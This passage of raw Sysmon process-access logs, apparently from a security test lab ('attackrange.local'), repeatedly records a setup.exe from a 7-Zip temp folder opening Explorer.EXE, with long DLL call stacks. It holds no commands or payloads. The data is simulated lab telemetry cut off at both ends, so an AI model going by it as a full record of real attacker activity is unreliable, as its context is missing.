s\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 